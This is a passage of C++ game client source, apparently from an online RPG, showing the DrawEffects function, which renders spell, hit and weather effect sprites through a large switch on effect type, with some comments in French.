		{	m_pEffectList[i]->m_mX2 = m_pEffectList[i]->m_mX;
			m_pEffectList[i]->m_mY2 = m_pEffectList[i]->m_mY;
		}
		return;
	}
}

void CGame::DrawEffects()
{int i, dX, dY, iDvalue,  tX, tY, rX, rY, rX2, rY2, rX3, rY3, rX4, rY4, rX5, rY5, iErr;
 char  cTempFrame;
 DWORD dwTime = m_dwCurTime;
 short sObjectType;
 char  cName[21];
 int iStatus;

 	for (i = 0;	i < DEF_MAXEFFECTS; i++)
	if ((m_pEffectList[i] != NULL) && (m_pEffectList[i]->m_cFrame >= 0))
	{	switch (m_pEffectList[i]->m_sType) {
		case 1: // Normal hit
			if (m_pEffectList[i]->m_cFrame < 0) break;
			dX = (m_pEffectList[i]->m_mX) - m_sViewPointX;
			dY = (m_pEffectList[i]->m_mY) - m_sViewPointY;
			m_pEffectSpr[8]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 2: // Arrow flying
			dX = (m_pEffectList[i]->m_mX) - m_sViewPointX;
			dY = (m_pEffectList[i]->m_mY) - m_sViewPointY;
			cTempFrame = (m_pEffectList[i]->m_cDir-1)*2;
			if (cTempFrame < 0) break;
			m_pEffectSpr[7]->PutSpriteFast(dX, dY, cTempFrame, dwTime);
			break;

		case 4: // gold
			// 1.5
			if (m_pEffectList[i]->m_cFrame < 9) break;
			cTempFrame = m_pEffectList[i]->m_cFrame - 9;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[1]->PutSpriteFast(dX, dY-40, cTempFrame, dwTime);
			break;

		case 5: // FireBall Fire Explosion
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			iDvalue = (cTempFrame - 8)*(-5);
			if (cTempFrame < 7)
				 m_pEffectSpr[3]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			else m_pEffectSpr[3]->PutTransSpriteRGB(dX, dY, cTempFrame, iDvalue, iDvalue, iDvalue, dwTime);
			break;

		case 6:	 // Energy Bolt
		case 10: // Lightning Arrow
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			iDvalue = (cTempFrame - 7)*(-6);
			if (cTempFrame < 6)
				 m_pEffectSpr[6]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			else m_pEffectSpr[6]->PutTransSpriteRGB(dX, dY, cTempFrame, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			break;

		case 7: // Magic Missile Explosion
			cTempFrame = m_pEffectList[i]->m_cFrame;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			iDvalue = (cTempFrame - 4)*(-3);
			if (cTempFrame < 4)
				 m_pEffectSpr[6]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			else m_pEffectSpr[6]->PutTransSpriteRGB(dX, dY, cTempFrame, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			break;

		case 8: // Burst
			cTempFrame = m_pEffectList[i]->m_cFrame;
			cTempFrame = 4 - cTempFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[11]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 9: // Burst
			cTempFrame = (rand() % 5);
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX) - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY) - m_sViewPointY;
			m_pEffectSpr[11]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 11: // pt grenat
			cTempFrame = (rand() % 5) + 5;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX) - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY) - m_sViewPointY;
			m_pEffectSpr[11]->PutTransSprite2(dX, dY, cTempFrame, dwTime);
			break;

		case 12: // Burst
			cTempFrame = (rand() % 6) + 10;
			if (cTempFrame < 0) break;
			iDvalue = (m_pEffectList[i]->m_cFrame - 4)*(-3);
			dX  = (m_pEffectList[i]->m_mX) - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY) - m_sViewPointY;
			if (cTempFrame < 4)
				 m_pEffectSpr[11]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			else m_pEffectSpr[11]->PutTransSprite(dX, dY, cTempFrame, dwTime);
			break;

		case 13:
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX) - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY) - m_sViewPointY;
			if (cTempFrame < 13)
			{	m_pEffectSpr[11]->PutTransSprite_NoColorKey(dX, dY, 25 + (cTempFrame / 5), dwTime);
			}else
			{	m_pEffectSpr[11]->PutTransSprite_NoColorKey(dX, dY, (8 + cTempFrame), dwTime);
			}
			break;

		case 14: // Traces de pas (terrain sec)
			if (m_pEffectList[i]->m_cFrame < 0) break;
			dX  = m_pEffectList[i]->m_mX - m_sViewPointX;
			dY  = m_pEffectList[i]->m_mY - m_sViewPointY;
			m_pEffectSpr[11]->PutTransSprite50_NoColorKey(dX, dY, (28 + m_pEffectList[i]->m_cFrame), dwTime);
			break;

		case 15: // petits nuages rouges
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = m_pEffectList[i]->m_mX - m_sViewPointX;
			dY  = m_pEffectList[i]->m_mY - m_sViewPointY;
			m_pEffectSpr[11]->PutTransSprite50_NoColorKey(dX, dY, (33 + cTempFrame), dwTime);
			break;

		case 16: //
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[0]->PutTransSprite_NoColorKey(dX, dY, 0, dwTime);
			break;

		case 17: //test
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = 39 + (rand() % 3)*3 + (rand() % 3);
			if (cTempFrame < 0) break;
			m_pEffectSpr[11]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			dX  = (m_pEffectList[i]->m_mX2)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY2)  - m_sViewPointY;
			m_pEffectSpr[11]->PutTransSprite50_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 18: //
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			m_pEffectSpr[18]->PutTransSprite70_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 20: // critical hit
		case 21:
		case 22:
		case 23:
		case 24:
		case 25:
		case 26:
		case 27: // Critical strike with a weapon
			dX = (m_pEffectList[i]->m_mX) - m_sViewPointX;
			dY = (m_pEffectList[i]->m_mY) - m_sViewPointY;
			m_pEffectSpr[8]->PutTransSprite_NoColorKey(dX, dY, 1, dwTime);
			break;

		case 30: // Mass-Fire-Strike
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			m_pEffectSpr[14]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 31: // Mass-Fire-Strike
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			m_pEffectSpr[15]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 32: // Trace de pas  (raining weather)
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = m_pEffectList[i]->m_cFrame + 20;
			if (cTempFrame < 0) break;
			m_pEffectSpr[11]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 33: //
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			iDvalue = 0;
			m_pEffectSpr[19]->PutTransSpriteRGB(dX, dY, cTempFrame, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			break;

		case 34: // absent (220 et 351)
			break;

		case 35: // Snoopy: Ajout
			if (m_pEffectList[i]->m_cFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = m_pEffectList[i]->m_cFrame;
			m_pEffectSpr[6]->PutTransSprite_NoColorKey(dX-30, dY-18, cTempFrame, dwTime);
			break;

		case 36: // Snoopy: Ajout
			if (m_pEffectList[i]->m_cFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = m_pEffectList[i]->m_cFrame;
			m_pEffectSpr[97]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 40:
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[20]->PutTransSprite50_NoColorKey(dX, dY, cTempFrame, dwTime); // 20
			break;

		case 41: // Large Type 1, 2, 3, 4
		case 42:
		case 43:
		case 44:
		case 45: // Small Type 1, 2
		case 46:
			dX  = (m_pEffectList[i]->m_sX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_sY)  - m_sViewPointY;
			m_pEffectSpr[21]->PutFadeSprite(dX, dY, 48, dwTime);
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			if ((8*(m_pEffectList[i]->m_sType-41) +cTempFrame) < (8*(m_pEffectList[i]->m_sType-41) +7))
			{	iDvalue = -8*(6 - cTempFrame);
				m_pEffectSpr[21]->PutTransSpriteRGB(dX, dY, 8*(m_pEffectList[i]->m_sType-41) +cTempFrame, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			}else
			{	if ((cTempFrame - 5) >= 8) cTempFrame = ((cTempFrame - 5) - 8) + 5;
				m_pEffectSpr[21]->PutSpriteFast(dX, dY, 8*(m_pEffectList[i]->m_sType-41) + (cTempFrame - 5), dwTime);
			}
			break;

		//HELLFIRE
		case 85:
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX = m_pEffectList[i]->m_mX;
			dY = m_pEffectList[i]->m_mY;
			m_pEffectSpr[135]->PutTransSprite_NoColorKey(dX + 30, dY - 155, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[135]->PutTransSprite_NoColorKey(dX + 20, dY - 105, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[135]->PutTransSprite_NoColorKey(dX + 10, dY - 55, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[135]->PutTransSprite_NoColorKey(dX, dY - 5, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 80, dY + 100, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 80, dY + 120, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 60, dY + 100, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 60, dY + 120, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[3]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			bAddNewEffect(10, dX, dY, NULL, NULL, 0, 0);
			break;
		case 86:
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX = m_pEffectList[i]->m_mX;
			dY = m_pEffectList[i]->m_mY;
			m_pEffectSpr[134]->PutTransSprite_NoColorKey(dX - 140, dY - 150, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[134]->PutTransSprite_NoColorKey(dX - 110, dY - 100, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[134]->PutTransSprite_NoColorKey(dX - 80, dY - 502, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[134]->PutTransSprite_NoColorKey(dX - 50, dY, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 60, dY + 100, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 60, dY + 120, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 50, dY + 100, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 50, dY + 120, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[3]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			bAddNewEffect(10, dX, dY, NULL, NULL, 0, 0);
			break;
		case 87:
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX = m_pEffectList[i]->m_mX;
			dY = m_pEffectList[i]->m_mY;
			m_pEffectSpr[133]->PutTransSprite_NoColorKey(dX + 115, dY - 150, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[133]->PutTransSprite_NoColorKey(dX + 85, dY - 100, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[133]->PutTransSprite_NoColorKey(dX + 55, dY - 50, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[133]->PutTransSprite_NoColorKey(dX + 20, dY, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 80, dY + 110, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 80, dY + 110, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 60, dY + 120, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX + 60, dY + 120, m_pEffectList[i]->m_cFrame, dwTime);
			bAddNewEffect(10, dX, dY, NULL, NULL, 0, 0);
			break;
		case 193://HELLFIRE	
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX = (m_pEffectList[i]->m_dX * 32) - m_sViewPointX;
			dY = (m_pEffectList[i]->m_dY * 32) - m_sViewPointY;
			//Timed Logic
			if ((timeGetTime() - m_pEffectList[i]->m_dwLoopEndTime) > 20)
			{
				int dwOffsetX, dwOffsetY;
				m_pEffectList[i]->m_dwLoopEndTime = timeGetTime();

				//Randomize the offsets of the X and Y
				dwOffsetX = iDice(1, 100);
				dwOffsetY = iDice(1, 80);
				switch (iDice(1, 3)) {
				case 1:
					switch (iDice(1, 4)) {
					case 1:
						bAddNewEffect(85, dX + dwOffsetX, dY + dwOffsetY, NULL, NULL, 0, 0);
						break;
					case 2:
						bAddNewEffect(85, dX - dwOffsetX, dY - dwOffsetY, NULL, NULL, 0, 0);
						break;
					case 3:
						bAddNewEffect(85, dX + dwOffsetX, dY - dwOffsetY, NULL, NULL, 0, 0);
						break;
					case 4:
						bAddNewEffect(85, dX - dwOffsetX, dY + dwOffsetY, NULL, NULL, 0, 0);
						break;
					}
					break;
				case 2:
					switch (iDice(1, 4)) {
					case 1:
						bAddNewEffect(86, dX + dwOffsetX, dY + dwOffsetY, NULL, NULL, 0, 0);
						break;
					case 2:
						bAddNewEffect(86, dX - dwOffsetX, dY - dwOffsetY, NULL, NULL, 0, 0);
						break;
					case 3:
						bAddNewEffect(86, dX + dwOffsetX, dY - dwOffsetY, NULL, NULL, 0, 0);
						break;
					case 4:
						bAddNewEffect(86, dX - dwOffsetX, dY + dwOffsetY, NULL, NULL, 0, 0);
						break;
					}
					break;
				case 3:
					switch (iDice(1, 4)) {
					case 1:
						bAddNewEffect(87, dX + dwOffsetX, dY + dwOffsetY, NULL, NULL, 0, 0);
						break;
					case 2:
						bAddNewEffect(87, dX - dwOffsetX, dY - dwOffsetY, NULL, NULL, 0, 0);
						break;
					case 3:
						bAddNewEffect(87, dX + dwOffsetX, dY - dwOffsetY, NULL, NULL, 0, 0);
						break;
					case 4:
						bAddNewEffect(87, dX - dwOffsetX, dY + dwOffsetY, NULL, NULL, 0, 0);
						break;
					}
					break;
				}
			}
			break;
		case 197:  // Fury-Of-Thor
			dX = (m_pEffectList[i]->m_mX) - m_sViewPointX;
			dY = (m_pEffectList[i]->m_mY) - m_sViewPointY;
			//Lineal
			_DrawThunderEffect(dX, dY - 800,
				m_pEffectList[i]->m_mX, m_pEffectList[i]->m_mY,
				m_pEffectList[i]->m_rX - 20, m_pEffectList[i]->m_rY, 3);
			_DrawThunderEffect(dX, dY - 800,
				dX, dY,
				m_pEffectList[i]->m_rX, m_pEffectList[i]->m_rY, 1);
			_DrawThunderEffect(dX, dY - 800,
				dX, dY,
				m_pEffectList[i]->m_rX + 18, m_pEffectList[i]->m_rY + 7, 2);
			_DrawThunderEffect(dX, dY - 800,
				dX, dY,
				m_pEffectList[i]->m_rX - 14, m_pEffectList[i]->m_rY - 7, 2);

			//Diagonal
			_DrawThunderEffect(dX - 500, dY - 800,
				m_pEffectList[i]->m_mX + 15, m_pEffectList[i]->m_mY + 10,
				m_pEffectList[i]->m_rX - 20, m_pEffectList[i]->m_rY, 3);
			_DrawThunderEffect(dX - 500, dY - 800,
				dX + 15, dY + 10,
				m_pEffectList[i]->m_rX, m_pEffectList[i]->m_rY, 1);
			_DrawThunderEffect(dX - 500, dY - 800,
				dX + 15, dY + 10,
				m_pEffectList[i]->m_rX + 18, m_pEffectList[i]->m_rY + 7, 2);
			_DrawThunderEffect(dX - 500, dY - 800,
				dX + 15, dY + 10,
				m_pEffectList[i]->m_rX - 14, m_pEffectList[i]->m_rY - 7, 2);

			//Diagonal
			_DrawThunderEffect(dX + 800, dY - 800,
				m_pEffectList[i]->m_mX + 15, m_pEffectList[i]->m_mY - 10,
				m_pEffectList[i]->m_rX - 20, m_pEffectList[i]->m_rY, 3);
			_DrawThunderEffect(dX + 800, dY - 800,
				dX + 15, dY - 10,
				m_pEffectList[i]->m_rX, m_pEffectList[i]->m_rY, 1);
			_DrawThunderEffect(dX + 800, dY - 800,
				dX + 15, dY - 10,
				m_pEffectList[i]->m_rX + 18, m_pEffectList[i]->m_rY + 7, 2);
			_DrawThunderEffect(dX + 800, dY - 800,
				dX + 15, dY - 10,
				m_pEffectList[i]->m_rX - 14, m_pEffectList[i]->m_rY - 7, 2);

			break;

		case 47:
		case 48:
		case 49: // Blizzard
			dX  = (m_pEffectList[i]->m_sX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_sY)  - m_sViewPointY;
			m_pEffectSpr[m_pEffectList[i]->m_sType-1]->PutRevTransSprite(dX, dY, 0, dwTime);
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			if (cTempFrame < 7) {
				iDvalue = -8*(6 - cTempFrame);
				m_pEffectSpr[m_pEffectList[i]->m_sType-1]->PutTransSpriteRGB(dX, dY, cTempFrame+1, iDvalue, iDvalue, iDvalue, dwTime);
			}
			else {
				if (cTempFrame >= 8) cTempFrame = cTempFrame % 8;
				m_pEffectSpr[m_pEffectList[i]->m_sType-1]->PutSpriteFast(dX, dY, cTempFrame+1, dwTime);
			}
			break;

		case 50:
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;

			if (cTempFrame <= 6) {
				iDvalue = 0;
				m_pEffectSpr[22]->PutTransSpriteRGB(dX, dY, cTempFrame, iDvalue, iDvalue, iDvalue, dwTime);	// RGB2
			}
			else {
				iDvalue = -5*(cTempFrame - 6);
				m_pEffectSpr[22]->PutTransSpriteRGB(dX, dY, 6, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			}
			break;

		case 51: //
			cTempFrame = m_pEffectList[i]->m_cFrame + 11; //15
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[28]->PutTransSprite25(dX, dY, cTempFrame, dwTime); //20
			break;


		case 52: // Protection Ring commente par siementec, a voir
		
			break;


		case 53: // Hold Twist
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			if (cTempFrame < 0) cTempFrame = 0;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[25]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime); //25
			break;

		case 54: //  star twingkling (effect armes brillantes)
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) cTempFrame = 0;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[28]->PutTransSprite(dX, dY, cTempFrame, dwTime);
			break;

		case 55: //
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) cTempFrame = 0;
			dX  = (m_pEffectList[i]->m_mX);
			dY  = (m_pEffectList[i]->m_mY);
			m_pEffectSpr[28]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 56: // Mass-Chill-Wind
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) cTempFrame = 0;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[29]->PutTransSprite50_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 57:  // absent (220 et 351)
			break;

		case 60:  //
		case 181: // MS
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			if (cTempFrame > 4)
			{	cTempFrame = cTempFrame / 4;
			}
			if (cTempFrame >= 0)
			{	dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
				dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
				m_pEffectSpr[31]->PutSpriteFast(dX, dY, 15 + cTempFrame, dwTime);
				m_pEffectSpr[31]->PutTransSprite(dX, dY, cTempFrame, dwTime);
			}
			break;

		case 61: // Fire aura on ground (crueffect1, 1)
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[32]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 62: // MS strike
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			if (cTempFrame > 0)
			{	cTempFrame = cTempFrame - 1;
				dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
				dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
				m_pEffectSpr[31]->PutRevTransSprite(dX, dY, 20 + cTempFrame, dwTime, cTempFrame/3);
			}
			break;

		case 63: // Fire explosion (crueffect1, 2)
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[33]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 64: // effet halo blancchatre
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[34]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 65: // MS from crusade striking
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			cTempFrame = cTempFrame / 6;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[31]->PutRevTransSprite(dX, dY, 20 + cTempFrame, dwTime, cTempFrame >> 2);
			break;

		case 66: // MS explodes on the ground
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[39]->PutRevTransSprite(dX, dY, cTempFrame, dwTime);
			m_pEffectSpr[39]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 67: // MS fire with smoke
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			switch (rand() % 3) {
			case 0: m_pEffectSpr[0]->PutTransSprite25_NoColorKey(dX, dY +20, 1, dwTime); break;
			case 1: m_pEffectSpr[0]->PutTransSprite50_NoColorKey(dX, dY +20, 1, dwTime); break;
			case 2: m_pEffectSpr[0]->PutTransSprite70_NoColorKey(dX, dY +20, 1, dwTime); break;
			}
			m_pEffectSpr[35]->PutTransSprite70_NoColorKey(dX, dY, cTempFrame/3, dwTime);
			break;

		case 68: // worm-bite
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			if (cTempFrame <= 11)
			{	m_pEffectSpr[40]->PutSpriteFast(dX, dY, cTempFrame, dwTime);
				m_pEffectSpr[41]->PutTransSprite50_NoColorKey(dX, dY, cTempFrame, dwTime);
				m_pEffectSpr[44]->PutRevTransSprite(dX-2, dY-3, cTempFrame, dwTime);
				m_pEffectSpr[44]->PutTransSprite_NoColorKey(dX-4, dY-3, cTempFrame, dwTime);
			}else
			{	switch (cTempFrame) {
				case 12:
				case 13:
				case 14: m_pEffectSpr[40]->PutSpriteFast(dX, dY, 11, dwTime); break;
				case 15: m_pEffectSpr[40]->PutTransSprite70_NoColorKey(dX, dY, 11, dwTime); break;
				case 16: m_pEffectSpr[40]->PutTransSprite50_NoColorKey(dX, dY, 11, dwTime); break;
				case 17: m_pEffectSpr[40]->PutTransSprite25_NoColorKey(dX, dY, 11, dwTime); break;
			}	}
			break;

		case 69: // identique au cas 70
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[42]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 70: // identique au cas 69
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[43]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 71: // absent v220 et v351
			break;

		case 72: // Blizzard
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			if (cTempFrame <= 8)
			{	iDvalue = 0;
				m_pEffectSpr[51]->PutTransSpriteRGB(dX, dY, cTempFrame, iDvalue, iDvalue, iDvalue, dwTime);
			}else
			{	iDvalue = -1*(cTempFrame - 8);
				m_pEffectSpr[51]->PutTransSpriteRGB(dX, dY, 8, iDvalue, iDvalue, iDvalue, dwTime);	// RGB2
			}
			break;

		case 73: // absent v220 et v351
		case 74: // absent v220 et v351
		case 75: // absent v220 et v351
		case 76: // absent v220 et v351
		case 77: // absent v220 et v351
			break;

		case 149:
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
